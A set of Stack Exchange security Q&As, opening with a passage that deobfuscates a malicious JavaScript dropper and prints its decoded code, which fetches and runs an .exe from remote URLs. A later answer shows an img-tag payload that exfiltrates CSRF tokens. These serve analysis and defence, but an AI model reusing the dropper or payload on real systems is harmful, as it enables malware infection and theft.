uumod=(new Function("fgwus","var ccuru=fgwus.match(/\\S{5}/g),tgrdm=\"\",ikkne=0;while(ikkne<ccuru.length){tgrdm+=String.fromCharCode(parseInt(ccuru[ikkne].substr(3,2),16)^76);ikkne++;}"+tljsw()+tljsw()+tljsw()+tljsw()+"(tgrdm);")(abisr));
An anonymous function is created from the long string of code, and that function in turn creates new code by picking characters from the long banks of seemingly random text at the top. At the end you have four function calls: tljsw()+tljsw()+tljsw()+tljsw() That function randomly returns one of the letters e, v, l and a. So sometimes it will give you eval. That executes code, but we don't want to do that. We just want to read the code. So let's replace it with console.log:
uumod=(new Function("fgwus","var ccuru=fgwus.match(/\\S{5}/g),tgrdm=\"\",ikkne=0;while(ikkne<ccuru.length){tgrdm+=String.fromCharCode(parseInt(ccuru[ikkne].substr(3,2),16)^76);ikkne++;}console.log(tgrdm);")(abisr));
We then get the following output:
function getDataFromUrl(url, callback) {
try {
var xmlHttp = new ActiveXObject("MSXML2.XMLHTTP");
xmlHttp.open("GET", url, false);
xmlHttp.send();
if (xmlHttp.status == 200) {
return callback(xmlHttp.ResponseBody, false);
} else {
return callback(null, true);
}
} catch (error) {
return callback(null, true);
}
}
function getData(callback) {
try {
getDataFromUrl("http://tiny" + "url.com/he3bh27", function(result, error) {
if (!error) {
return callback(result, false);
} else {
getDataFromUrl("http://oamnohndpiwpicgm.onion.nu/10.mov", function(result, error) {
if (!error) {
return callback(result, false);
} else {
getDataFromUrl("http://tiny" + "url.com/he3bh27", function(result, error) {
if (!error) {
return callback(result, false);
} else {
return callback(null, true);
}
});
}
});
}
});
} catch (error) {
return callback(null, true);
}
}
function getTempFilePath() {
try {
var fs = new ActiveXObject("Scripting.FileSystemObject");
var tmpFileName = "\\" + Math.random().toString(36).substr(2, 9) + ".exe";
var tmpFilePath = fs.GetSpecialFolder(2) + tmpFileName;
return tmpFilePath;
} catch (error) {
return false;
}
}
function saveToTemp(data, callback) {
try {
var path = getTempFilePath();
if (path) {
var objStream = new ActiveXObject("ADODB.Stream");
objStream.Open();
objStream.Type = 1;
objStream.Write(data);
objStream.Position = 0;
objStream.SaveToFile(path, 2);
objStream.Close();
return callback(path, false);
} else {
return callback(null, true);
}
} catch (error) {
return callback(null, true);
}
}
getData(function(data, error) {
if (!error) {
saveToTemp(data, function(path, error) {
if (!error) {
try {
var wsh = new ActiveXObject("WScript.Shell");
wsh.Run(path);
} catch (error) {}
}
});
}
});
I don't know what that code does, but the second I copy-pasted it into a text editor my antivirus started screaming about it... As LegionMammal978 points out in the comments, this seems to target IE browsers with bad config, but to be on the safe side you could assume that the computer this was run on is infected by malware and treat it as such. (Note that I had to split the URLs into "tiny" + "url" because Stack Exchange does not let you post that URL... This should not change the behaviour of the code, though.)
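As a final note, you don't actually have to execute any of the attacker's code to recover the payload: the decode loop is simple enough to replicate offline. A rough Python equivalent of what the anonymous function does (split the blob into 5-character groups, read characters 4-5 of each group as hex, XOR with 76):
import re

def decode(blob):
    groups = re.findall(r"\S{5}", blob)
    return "".join(chr(int(g[3:5], 16) ^ 76) for g in groups)

# decode(abisr) reproduces the script shown above without running it
Running the attacker's code, even with eval swapped for console.log, is best done in a throwaway VM. | {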
"source": [
"https://security.stackexchange.com/questions/148497",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/136475/"
]
} |
148,750 | For a person looking to use a VPN solution for personal use, what are the pros and cons of paying for a VPN service as opposed to just hosting a VPN on your own rented, in-the-cloud server, except for the obvious managed vs unmanaged argument? | VPNs are designed around the concept of trust between 2 or more parties, and were intended for corporate/enterprise use. The popularity of offering "Free VPN" or "Hosted VPN" solutions to the consumer market has dramatically increased. A lot of people seem to forget there has to be "trust" involved. You wouldn't want to have some random person on your home network, so why would you tolerate that on a virtual upscaling of that idea? Hosting your own private VPN solution has one key, distinct advantage: you trust yourself. You know how data is handled, you know who can view VPN data as it's relayed, and you can ensure its quality, reliability, and anonymity. Most people will use a VPS (Virtual Private Server) for hosting a VPN. Using a third-party hosted solution does come at a cost of some trust; corporations are legally bound entities which may be required to hand over subscriber information. Some self-hosted solutions overcome this with payment in bitcoin (for the virtual private server or physical hardware). In some countries, a corporation may also be required to log usage by their clients. Beyond this, you will have to address each company's privacy policy and terms of use. Tor was the answer for the consumer's idea of anonymity on the internet. This again has some issues with trust, mainly that entry/exit nodes have full implicit trust. It is not made apparent if a "rogue" node were to log your connections, or pass your information in the clear. If you are not overly concerned about "trust", here are some bullet points to think about:
Self-Hosted
- Security and anonymity to your standards
- Can be faster, as you are the only one using the service
- Must keep up to date with patches/security of software
- Your information is known to the hoster, which could be a third party
- Only your hosting platform is aware of your IP address
Outsourced Hosting
- Cheaper, and generally more reliable/constant service
- Don't have to worry about patches/security of software
- Simple payment plans, and generally cheaper
- What happens to your data in between is anyone's guess
- Your data/connections might be logged for legal reasons
- Your data might be altered on the fly for advertisement revenue
Tor
- Easy, usable by the general population
- Free, no real costs
- What entry/exit points do with your data is anyone's guess
- Slow, due to the number of relays, and non-profit architecture | {
"source": [
"https://security.stackexchange.com/questions/148750",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/136779/"
]
} |
148,957 | We got an official email saying that our website had been hacked. They cited the URL to use to see the new suspicious file that had been dropped in our web root folder ( s.htm ). Just some text about a "Morrocan Made hacker - I'm Back" in the HTML file. Nothing else seemed damaged although we are investigating. The link included in the email was exactly hXXp://example.com[.]au/s.htm in plain text, which is also a bit weird, although helped us find the file. The date stamp on the file is only 7 hours and 3 minutes different to the Sent date on the email. 7 hours could easily be a timezone deviation. My question is: How did the government agency ( CERT ) know that our website was hacked? It's an Australian hosted website, for a legitimate business - and the government agency is legitimate. | It's extremely easy to fake email. If someone did fake this, I don't see how the agency would know about it. The concern is that the link they sent you was the attack itself. For example, this could be a CSRF attack: With a little help of social engineering ( such as sending a link via
email or chat), an attacker may trick the users of a web application
into executing actions of the attacker's choosing. One suggestion is to contact the office and find out if this is something they do. The fact that the language seems right and the message says it's from the right sender means nothing; that's a common approach used in phishing emails. | {
"source": [
"https://security.stackexchange.com/questions/148957",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/97202/"
]
} |
149,133 | A canary word is a sequence of bits placed at the boundary between a buffer (such as a stack) and control data in a program, as a way of detecting and reacting to buffer overflows. How many bits long are these canaries on Linux, usually? | Let's try it out! Here is a very simple example program. int test(int a)
{
return a;
}
Compile it with GCC and intercept the compilation at the assembly stage. (The -S flag will do this.) Rename the assembly file (so it won't be overwritten) and compile again, this time also adding the -fstack-protector-all and -mstack-protector-guard=global flags. The first flag enables stack canaries for all functions, the second selects a global canary instead of a thread-local one. (The thread-local default is probably more useful in practice, but the assembly for the global version is easier to understand.) Comparing the two generated assembly files, we spot the following addition (comments are mine).
movl %edi, -20(%rbp) ; save function parameter onto stack (unrelated to canary)
movq __stack_chk_guard(%rip), %rax ; load magic value into RAX register
movq %rax, -8(%rbp) ; save RAX register onto stack (place the canary)
movl -20(%rbp), %eax ; load function parameter into EAX register for return (unrelated to canary)
movq -8(%rbp), %rcx ; load canary value into RCX register
movq __stack_chk_guard(%rip), %rdx ; load magic value into RDX register
cmpq %rdx, %rcx ; compare canary value to expected value
je .L3 ; if they are the same, jump to label .L3 (continue)
call __stack_chk_fail ; otherwise (stack corruption detected), call the handler
.L3:
leave
We can see that the canary is handled in the RAX, RCX and RDX registers, which are all 64 bits wide. (Their 32 bit counterparts would be named EAX, ECX and EDX. The 16 bit versions are named AX, CX and DX. The 8 bit variants AL, CL and DL.) Another clue is that the operations to store, load and compare the canary (MOVQ and CMPQ) have a 'Q' suffix, which identifies a 64 bit instruction. (32 bit instructions have an 'L' suffix, 16 bit instructions a 'W' and 8 bit versions a 'B'.) Hence, we conclude that the canary is a 64 bit value, which makes sense on a 64 bit architecture (x86_64 GNU/Linux in my case). I expect that they'll always use the native word size, as that makes the most sense to me. You can try the same experiment on your machines and see what you get. | {
"source": [
"https://security.stackexchange.com/questions/149133",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/137103/"
]
} |
149,168 | I'm starting to have a big list of passwords I need safely stored. I was looking at password managers like LastPass, but these always seem to be targeted by hackers and have been compromised before. Would I lose anything from storing my passwords in a text document that I encrypt myself using AES 256? Then just decrypt when I want the password? | Considering those compromises you mention, do you think that encrypting files yourself will be easy? How do you know you won't fall into the same pitfalls that resulted in compromises of password managers? AES 256 is believed to be computationally secure. Every computer ever made working simultaneously to brute force the key, working since the beginning of time, would have a probabilistically negligible chance of ever finding the key to an encryption. However: a secure algorithm doesn't guarantee a secure implementation. Just to give you an example, here are a few questions you should ask yourself:
- How are you going to ensure that two identical passwords in your list are not encrypted to identical AES ciphertext (so that if the adversary knows one password, he'll know where it is reused)?
- Are you sure your decrypted password list cannot be reclaimed by a process allocating RAM after you have consulted your list?
- Are you sure your decrypted password list will not end up in the swapfile?
- What communication mechanisms will you use between the user providing the master password, the process decrypting the password list, and the target application in need of one password?
Password managers are designed with those concerns (and perhaps many others) in mind. It's almost impossible to get everything right when doing it yourself the first time, especially if you're not a security expert.
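To make the first pitfall concrete: naive "encrypt the file with AES" code often ends up in ECB mode, where equal plaintext blocks produce equal ciphertext blocks. A quick demonstration (Python with the pyca/cryptography library; ECB is used here deliberately as the thing not to do):
import os
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

key = os.urandom(32)
enc = Cipher(algorithms.AES(key), modes.ECB()).encryptor()
entry = b"hunter2hunter2!!"                 # a 16-byte "password" record
ct = enc.update(entry + entry) + enc.finalize()
print(ct[:16] == ct[16:])                   # True: the repetition is visible
Avoiding this (with a random IV/nonce and an authenticated mode) is exactly the kind of detail a vetted password manager has already taken care of. | {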
"source": [
"https://security.stackexchange.com/questions/149168",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/71974/"
]
} |
149,202 | Suppose I have some confidential information that is encrypted and I'm forced/compelled to disclose that password. My goal is to make that decrypted payload seem meaningful and the password valid. Is there any such algorithm that allows for a different password to be applied to the same payload, so that the alternate decrypted data is disclosed? | With many common algorithms, by changing the key, it is quite possible to get any arbitrary data in the first block. Where you run into trouble is when the data is longer than the key block size. The rest of the data (beyond the first block) would look random after swapping keys, assuming you are using a secure chaining method. You could use an insecure chaining method, but I wouldn't recommend it. You could use XOR OTP encryption. This is different from most encryption, where the key is mathematically re-used. With OTP (One Time Pad), the key is the same length as the data. With XOR (one of the most common OTPs) you have the flexibility to arbitrarily produce the desired message. (Your adversary may be aware of this possibility?) To start, create files of equal length:
- original message
- random data (the real key)
XOR them together: this gives you the encrypted message. Then take:
- fake message
- encrypted message
XOR them together: this gives you the fake key. To decrypt, take:
- encrypted message
- real or fake key
XOR them to get the real or fake message. As @Alpha3031 commented, you could actually encrypt one message (e.g. the fake one) with traditional AES (more common, and requires a smaller key file) and then use XOR (less common) to produce the other (e.g. the real message?). XOR can be applied to any files that are sufficiently unpredictable/random (e.g. encrypted data).
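The whole scheme fits in a few lines. A toy demonstration (Python; note the two messages must be the same length):
import os

def xor_bytes(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

real = b"attack at dawn!!"
key  = os.urandom(len(real))            # the real one-time pad
ct   = xor_bytes(real, key)             # what you store

fake     = b"buy more turnips"          # same length as the real message
fake_key = xor_bytes(ct, fake)          # the "key" you hand over under duress

assert xor_bytes(ct, fake_key) == fake
assert xor_bytes(ct, key) == real
The deniability only holds if the fake key is indistinguishable from a real one, i.e. if both look uniformly random. | {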
"source": [
"https://security.stackexchange.com/questions/149202",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/396/"
]
} |
149,378 | This question is inspired by this article (in Russian) about a website called I Know What You Download. From what I understand, they scan the DHT networks and display torrents that any given IP participated in, and although it is sometimes inaccurate, it can provide data on Internet usage, and thus presents a threat to anonymity. Most people suggest using a VPN in order to conceal torrent traffic. However, in another article (also in Russian) the same author shares his experience with torrenting over a VPN set up in Azure. Apparently, he received a DMCA notice for torrenting a film (the author specifically notes that he did not fully download the film, and everything was done for the sake of the experiment). They provided the name and the size of the file, along with the IP address and port. But some (if not all) torrent-sharing programs have an encryption feature. For instance, Tixati can even enforce encryption for both incoming and outgoing connections. The question is: what does this feature encrypt? The name of the file, its contents, size? Could it prevent DMCA notices? If not, what does it actually do? Related: the answer there mentions encryption — does this kind of encryption count? | Think of it like an underground fight club. Encrypting the traffic means nobody on the outside can see you enter or leave, but once you're inside, everybody there knows who you are and can monitor your participation. This feature is really only useful if you have an ISP that blocks torrent traffic. Encrypting it means it doesn't appear to be torrent traffic, it's just an encrypted stream, but once you get past the ISP and connect to the swarm, everybody else participating knows exactly who you are and what you're doing. | {
"source": [
"https://security.stackexchange.com/questions/149378",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/137363/"
]
} |
149,466 | GitHub explains the problem with img-src in "GitHub's post-CSP journey" : A tag with an unclosed quote will capture all output up to the next
matching quote. This could include security sensitive content on the
pages such as: <img src='https://some-evil-site.com/log_csrf?html= <form action="https://github.com/account/public_keys/19023812091023"> ... <input type="hidden" name="csrf_token" value="some_csrf_token_value"> </form> The resulting image element
will send a request to https://some_evilsite.com/log_csrf?html=...some_csrf_token_value ....
As a result, an attacker can leverage this dangling markup attack to
exfiltrate CSRF tokens to a site of their choosing. How does this differ from pressing page-source on the page and sending the content manually? If it is just for pages where users can insert input, don't we have to prevent only those issues with inputs by adding validations to the input? Not prevent img src of other sources in all the code? | Just to be clear about how the attack works:
1. A site allows you to enter text that is later displayed somewhere. It does not properly filter out HTML.
2. Mallory enters <img src='https://some-evil-site.com/log_csrf?html= and sends a link to the page to Alice.
3. Alice views the page, and the rest of the page, with Alice's secret content, is sent to some-evil-site.com, which Mallory controls.
How does it differ from pressing page-source on the page and sending the content manually? You view the source on your computer, generated with your credentials, so it does not contain anything that is secret from you. The point of the attack discussed in the blog post is to "steal" the source from someone else (by injecting HTML) so you can read their secrets. If it is just for pages where users can insert input, don't we have to prevent only those issues on inputs by adding validations to the input? Yes, we need to do that even if we implement a CSP. But humans are fallible creatures and we might make mistakes. Having a CSP that stops this kind of attack might therefore be good as defence in depth. Not prevent img src of other sources in all the code? If you don't want to allow images from arbitrary domains anyway, it might be good to whitelist the domains you do want to allow images from and block everything else. Again, you should have other kinds of protections against this, but it never hurts to have a backup.
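For reference, such a whitelist is a single response header, for example (the image host is hypothetical):
Content-Security-Policy: img-src 'self' https://images.example.com
With that policy in place, the dangling <img> pointing at some-evil-site.com is simply never fetched, so nothing is exfiltrated even if the HTML filtering slips. | {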
"source": [
"https://security.stackexchange.com/questions/149466",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/137438/"
]
} |
149,613 | Is there some place for a consumer to file a complaint concerning improper use of credit card information? I gave my credit card to a towing company and they sent me a receipt via email with all of my credit card info in the notes field. The email sent is in no way secure. Is there a government agency where I can file a complaint? I believe my credit card is now compromised and I am going to cancel it and get it reissued. I don't believe this company has a clue about the risk they are placing their company in. | (Note: Not a PCI QSA, just know some PCI and PII stuff) Violating the Payment Card Industry Data Security Standard is not a violation of the law. The PCI DSS is an agreement between the payment card companies (VISA, etc) and the processors about how data will be secured. The towing company is likely in breach of an agreement with their processor by doing this - and almost certainly would be more liable in case of leaked information. If the email indicates the credit card processor, you could contact them. You could also contact the towing company directly. Lastly, as @Matthew suggests, you should let the bank know when you cancel. A further possibility is to look at the Personally Identifiable Information statutes in your state (assuming you are in the US). PII statutes vary widely depending on your location, but they widely consider the credit card number (known as the PAN) as counting as PII (along with the other personal information presumably in that email). If your location has a privacy commissioner, you could raise it with that department. Most PII statutes have requirements that companies treat PII with appropriate care and there are some significant penalties for not doing so in many jurisdictions. For PCI, you can look at this info sheet on reporting violations | {
"source": [
"https://security.stackexchange.com/questions/149613",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/137567/"
]
} |
149,768 | SSH Server: I only allow public-key authentication. Malicious Software: If it's running as my user it has access to my data and an internet connection, it's bad enough already. Yes, su access would make it worse, but the issue here is not password strength but having trusted a malicious application. Physical Access: su access is irrelevant at this point, the attacker has physical access to my hard drive, so they can do as they wish. So, in what scenario does having a strong password that is error-prone to type help me? | You seem to have a pretty clear understanding of the risks. As others have stated, it is highly encouraged to use a strong password, so if you are running a sensitive service, then by all means, please use strong passwords only. When using a weak password, there are a couple of risks that come to mind which you did not mention: There may be other services besides SSH (e.g. FTP or others) that are still accepting password-based authentication. It's quite possible that one of those services will be accidentally enabled some time in the future, or a sysadmin may temporarily enable password-based authentication on the SSH server. There is an important point you did not mention in regards to malicious applications . In the event of an intrusion into a non-root account, it is extremely important to prevent an upgrade to root access . If the root password is weak then you may very well have an open vulnerability there via brute force. Also, supposing there is some other account that has sudo permission, these need strong passwords also. Do not dismiss the importance of preventing malicious applications from being able to gain root access; and beware of the risk of changes in your configuration. Also there is a strong possibility that you and I do not know the same attack vectors that your adversary does . You may be able to increase the length of the password to compensate for decreased complexity, thereby making it easier to type. As a touch typist, I have a hard time relating to your problem though. | {
"source": [
"https://security.stackexchange.com/questions/149768",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/24880/"
]
} |
149,852 | I have been looking into how https and ssl protect the user from captive portals. If a client tries to access https://www.google.com and the hotspot does not provide a valid certificate it prevents the user from connecting. How then do hotspots like xfinitywifi redirect all requests, https or not, to their login page? They have a certificate for wifi.xfinity.com but not for google so shouldn't the browser not connect? EDIT: The answers below are very informative and I have learned a lot but I still do not understand this aspect: in my case with Xfinity hotspots the user does not have to ignore a warning because there is none. It seamlessly transfers https sites to its own login site without warnings. I know that the test site that I go to is https. Why is this? | Most hotspots redirect with invalid certificates. Browsers and operating systems use heuristics to detect that behavior. The determination of being in a captive portal or being online is made by attempting to retrieve a plain-HTTP probe page, e.g. http://clients3.google.com/generate_204 (see https://www.chromium.org/chromium-os/chromiumos-design-docs/network-portal-detection ). MacOS and iOS use http://captive.apple.com/hotspot-detect.html (thanks @ceejayoz ). For example, Android will display a notification to redirect the user to the portal login page.
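You can reproduce the probe yourself; a quick sketch with curl:
curl -s -o /dev/null -w '%{http_code}\n' http://clients3.google.com/generate_204
On an open connection this prints 204. Behind a captive portal the hotspot intercepts the unencrypted request and answers with a redirect or its own login page instead, which is how the OS knows to pop up the portal screen; no HTTPS certificate for the sites you actually visit ever has to be forged. | {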
"source": [
"https://security.stackexchange.com/questions/149852",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/83684/"
]
} |
149,994 | Everyone is aware of the convention/need for strong passwords. With the number of different kinds of clues people can use in their passwords, plus the various permutations of caps and digit-letter substitution, a hacker would need to make many attempts on average, in order to get the successful password. This link: Slowing down repeated password attacks discusses some effort to discourage all that guessing, although it's not the same question I have: Why hasn't it become the norm to interfere with repeated guesses? An increasing backoff time after each wrong guess is one way, and others have been discussed. I have seen very few attempts to inhibit such guessing on Linux systems, or any web-based authentication. I have been locked out of one system when I got it wrong 3 times. IT folks impose more and more constraints, like character count, letters, digits, caps, and exclusion of user name from password. But that simply increases the number of needed attempts in a situation where the number is not really restricted. | I'd like to challenge your assumption that this isn't being done. [warning: wild approximations to follow] Remember that a successful brute-force attack will require millions or billions of guesses per second to do the crack in a reasonable amount of time (say, a couple of hours to a month depending on the strength of your password). Even a rate-limit of 100 password attempts per second would increase the crack time from a month to hundreds of thousands of years. Maybe my standards are low, but that's good enough for me, and no human user legitimately trying to get into their account will ever notice it. Even better if the rate-limit is by IP rather than by username, just to prevent some kinds of Denial-Of-Service attacks. Also, I don't know which Linux distribution you're using, but on my Ubuntu and CentOS systems, when I mistype my password at either the GUI or terminal login screens, it locks for 1 second before re-prompting me. Even if the server isn't actively rate-limiting login attempts (which they really should be), just the ping time by itself is enough to slow you down to millions of years. You'll probably DDOS the server before getting anywhere close to 1 billion guesses per second. The real money is in getting a copy of the hashed passwords database and feeding that into a GPU rig where billions of guesses per second are possible. TL;DR: if you are going to put effort into hardening your login server, you'll get more bang for your buck by improving your password hashing and making your database hard to steal than by implementing rate-limiting on your login screen. UPDATE : Since this went viral, I'll pull in something from the comments: This logic only applies to login servers. For physical devices like phones or laptops, a "3 attempts and it locks" or a "10 attempts and the device wipes" type thing still makes sense because someone could shoulder-surf while you're typing your password, or see the smudge pattern on your screen, or know that a 4-digit PIN only has 10,000 combinations anyway, so the number of guesses they need to do is very very much smaller.
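To make those wild approximations concrete, a quick back-of-the-envelope sketch in Python (the keyspace and guess rates are illustrative assumptions, not measurements):
keyspace = 36 ** 8                       # 8 chars of lowercase+digits: ~2.8e12 candidates
year = 3600 * 24 * 365
for rate in (100, 1_000_000_000):        # online rate-limited vs. offline GPU rig
    seconds = keyspace / 2 / rate        # expected tries: half the keyspace
    print(f"{rate:>13} guesses/s -> {seconds / year:.6g} years")
At 100 guesses per second the expected time is on the order of centuries; at a billion guesses per second the same keyspace falls in well under an hour, which is exactly why the hashing and database side matters more than the login screen. | {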
"source": [
"https://security.stackexchange.com/questions/149994",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/89130/"
]
} |
150,078 | My goal is to create a certificate with openssl similar to this one generated with cfssl Certificate:
Data:
Version: 3 (0x2)
Serial Number:
60:44:dc:0d:80:f4:54:55:e8:0d:95:61:f8:8f:b7:7e:f7:8d:29:69
Signature Algorithm: ecdsa-with-SHA384
Issuer: C=US, ST=California, L=San Francisco, O=Honest Achmed's Used Certificates, OU=Hastily-Generated Values Divison, CN=Autogenerated CA
Validity
Not Before: Jan 30 14:18:00 2017 GMT
Not After : Jan 30 14:18:00 2018 GMT
Subject: L=the internet, O=autogenerated, OU=etcd cluster, CN=etcd
Subject Public Key Info:
Public Key Algorithm: id-ecPublicKey
Public-Key: (384 bit)
pub:
04:53:03:35:3e:cc:4f:19:19:46:0c:f2:81:a0:15:
c9:9e:e1:ab:7f:19:66:14:c8:7a:27:2b:68:ca:c9:
4d:cb:a9:c9:24:eb:cc:83:d8:9c:45:9d:aa:5c:3f:
f5:7b:7c:56:da:3e:4f:ec:5e:a6:68:15:23:51:97:
2c:c8:68:75:57:bb:26:e8:5e:d0:ca:c5:00:cb:f3:
b1:24:af:05:b6:c4:58:18:44:c4:a7:40:1a:35:d6:
d2:6a:9d:3d:bd:66:e5
ASN1 OID: secp384r1
NIST CURVE: P-384
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
86:DF:8E:43:75:4A:75:B0:BF:D5:DC:17:75:A4:FC:8C:23:76:CF:75
X509v3 Authority Key Identifier:
keyid:3B:65:F0:74:60:17:FC:0D:4E:CF:7A:63:5F:DB:6F:B3:CC:95:39:71
X509v3 Subject Alternative Name:
DNS:localhost, IP Address:192.168.73.120, IP Address:192.168.73.121
Signature Algorithm: ecdsa-with-SHA384
30:64:02:30:01:6f:4a:4e:71:06:e8:79:b6:46:72:ae:13:21:
fd:0b:91:ab:a9:18:a2:2a:ec:89:f3:c9:18:e3:31:7e:a7:d3:
51:8d:b8:e2:8c:64:32:33:63:d7:54:7c:1d:67:08:e5:02:30:
05:92:43:9d:51:a6:92:d6:42:82:2f:86:9c:0e:31:be:47:51:
d8:6d:68:c6:83:a1:24:9b:25:e4:15:af:fc:65:96:28:8f:de:
4d:b4:84:73:8a:cd:44:af:df:96:91:cd In order to do so, I'm running the following commands: openssl genrsa -out etcd1-key.pem 2048
openssl req -new -key etcd1-key.pem -config openssl.conf -subj '/CN=etcd' -out etcd1.csr
openssl x509 -req -in etcd1.csr -CA ca.pem -CAkey ca-key.pem -CAcreateserial -out etcd1.pem -days 1024 -sha256 The content of openssl.conf is: [req]
req_extensions = v3_req
distinguished_name = dn
[dn]
[v3_req]
basicConstraints = CA:FALSE
keyUsage = digitalSignature, keyEncipherment
subjectAltName = IP:127.0.0.1, IP:192.168.73.120, IP:192.168.73.121 This is the csr file: Certificate Request:
Data:
Version: 0 (0x0)
Subject: CN=etcd
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
Public-Key: (2048 bit)
Modulus:
00:a7:cd:eb:4c:9b:d0:30:f6:65:21:da:26:1c:e0:
82:cd:d4:79:d6:51:95:ec:9a:cb:0f:f9:99:14:cd:
dc:ba:ee:0d:5c:2e:ed:05:88:6b:c6:36:16:34:64:
5d:89:27:05:89:d2:38:99:24:47:a1:95:eb:7c:c8:
3f:d0:c1:cf:f2:41:0c:09:2d:03:e9:fc:ac:37:30:
f6:53:c7:e1:6e:12:bb:dc:8d:c5:4a:ba:77:ba:4b:
c5:b5:7f:0f:68:a3:e2:e8:c8:24:1a:f4:46:6f:41:
ba:03:02:42:6d:44:dd:95:47:b4:9f:c7:b6:de:c5:
91:b7:27:62:85:ba:17:2b:df:25:b6:0c:09:05:04:
a5:36:22:55:8a:9f:5b:fc:dd:53:d0:19:00:c8:90:
74:b8:18:66:f2:c9:44:2c:45:0f:01:3e:f4:fe:3b:
6e:09:d7:3f:ea:f3:e9:ab:b8:32:c2:f7:e2:af:2a:
d5:a7:79:2a:ec:75:8a:24:be:b5:a8:21:37:f0:b8:
cf:63:6f:0f:82:14:10:8c:21:c6:56:31:3a:e7:28:
18:76:4e:ac:19:fa:e7:02:e2:56:ab:03:a1:8e:2f:
5d:c9:e4:e7:b6:e4:12:d3:41:b4:b0:a0:94:b9:24:
d6:4d:14:20:43:d2:04:94:58:23:7f:76:d5:28:65:
b5:9f
Exponent: 65537 (0x10001)
Attributes:
Requested Extensions:
X509v3 Basic Constraints:
CA:FALSE
X509v3 Key Usage:
Digital Signature, Key Encipherment
X509v3 Subject Alternative Name:
IP Address:127.0.0.1, IP Address:192.168.73.120, IP Address:192.168.73.121
Signature Algorithm: sha256WithRSAEncryption
29:87:46:77:85:2e:22:a8:1d:5c:c4:f9:b4:f7:ae:e7:99:d9:
a3:24:31:51:1f:57:f5:a4:40:1d:a6:16:4e:af:eb:60:f5:ac:
10:92:9b:25:be:e6:79:e7:99:04:2d:80:a1:3d:42:62:77:16:
40:52:38:27:3b:fe:b5:d6:41:59:68:0c:38:47:57:00:d6:2f:
83:16:99:8a:70:5d:a8:0a:e8:b7:1b:c6:b9:69:70:6c:ee:84:
04:8e:6a:3a:27:5e:ce:97:88:4c:88:93:69:11:17:59:95:e8:
9a:da:b3:9b:37:d5:38:81:2e:b8:41:f8:32:7f:0b:50:d3:30:
c5:51:c4:5c:aa:f8:ff:c6:08:44:e5:58:26:f7:ad:ba:e2:76:
f1:c1:c5:08:e6:b5:29:cb:f5:ce:f8:0b:45:a2:1d:f0:ee:d2:
1b:be:75:a6:4a:16:f0:9f:ec:b2:1a:49:31:a5:de:5e:ea:54:
27:0c:47:a2:8b:6f:aa:05:d9:b8:3c:20:81:28:bd:b8:0a:76:
39:f6:2b:4a:7f:e7:93:44:03:30:ce:b4:3e:b8:b2:55:9b:c4:
06:65:61:16:26:02:d0:d3:01:cb:89:fc:6f:3f:7d:0c:e8:12:
a6:31:04:4e:bc:56:3f:42:31:49:1d:d5:c5:e0:09:25:97:3f:
67:3a:5c:d3 And finally, this is the content of the certificate ( etcd1.pem ) that is generated: Certificate:
Data:
Version: 1 (0x0)
Serial Number: 10309206242166002114 (0x8f11a874ec8b51c2)
Signature Algorithm: sha256WithRSAEncryption
Issuer: CN=etcdCA
Validity
Not Before: Feb 1 14:12:24 2017 GMT
Not After : Nov 22 14:12:24 2019 GMT
Subject: CN=etcd
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
Public-Key: (2048 bit)
Modulus:
00:db:79:86:ad:b3:96:64:b3:52:49:56:bd:d6:4f:
5c:ef:8c:90:86:4f:2f:f9:9a:42:f4:38:55:79:c6:
70:bb:86:37:45:52:1c:f1:97:67:83:c4:12:04:c4:
84:44:e9:28:c9:b2:ef:d1:24:a2:e6:1e:7b:c7:4c:
6e:36:aa:fb:3b:43:c0:2b:28:1f:68:79:36:f0:47:
10:ec:91:c0:f9:82:80:32:c3:c5:8b:5f:f9:38:9e:
23:67:de:17:fc:a7:cc:03:26:41:fd:67:74:5d:e7:
7e:d0:31:fb:a2:ad:1c:86:6a:da:6f:11:11:59:63:
d9:31:a6:14:30:6e:0b:0a:bb:4b:0f:ae:21:3a:f2:
4c:34:b3:43:9c:60:ef:af:52:db:51:ec:bf:81:71:
8f:d2:6c:8d:46:7b:6c:8a:5b:8f:74:53:36:0b:cd:
7a:fb:9c:a4:22:c3:75:10:42:7a:ae:c3:91:cf:16:
ff:5b:a2:34:e9:4b:c0:fe:8d:4d:71:a4:25:65:59:
27:24:7a:52:ec:2f:f9:b6:12:5d:aa:77:df:b1:97:
49:d5:c1:12:8d:0f:3c:39:b2:d7:42:2e:de:e9:1f:
41:3c:a6:69:27:ff:ed:30:55:6a:ce:08:fc:28:98:
79:d0:dc:0c:4f:0b:b6:c8:5d:80:bb:47:6c:60:6f:
81:cd
Exponent: 65537 (0x10001)
Signature Algorithm: sha256WithRSAEncryption
51:06:03:cb:21:3b:34:e1:2c:9e:16:cc:f1:64:9d:bb:13:11:
24:fd:2e:67:22:83:9e:91:09:9b:4b:b8:f2:c1:03:5c:45:bf:
79:0d:c3:04:81:a7:ce:b9:89:64:ab:ae:7f:86:24:79:cf:e4:
ea:63:73:e3:a3:e0:ef:70:47:f6:19:84:f9:78:e4:27:75:f5:
69:2e:ca:14:47:bd:73:9f:c9:0d:25:73:09:a1:cd:11:67:0a:
eb:3b:b2:b0:b3:97:16:37:23:08:ea:a8:5a:fd:25:52:17:8b:
1e:99:b0:d6:8d:fc:ba:dc:85:29:1c:2a:8c:ea:5a:65:81:fc:
12:50:b1:25:a1:9f:56:8b:8a:d5:15:cc:17:bb:4c:60:4e:da:
d3:a2:08:a8:7d:95:19:67:dc:6f:4b:4f:6f:49:f0:81:66:b9:
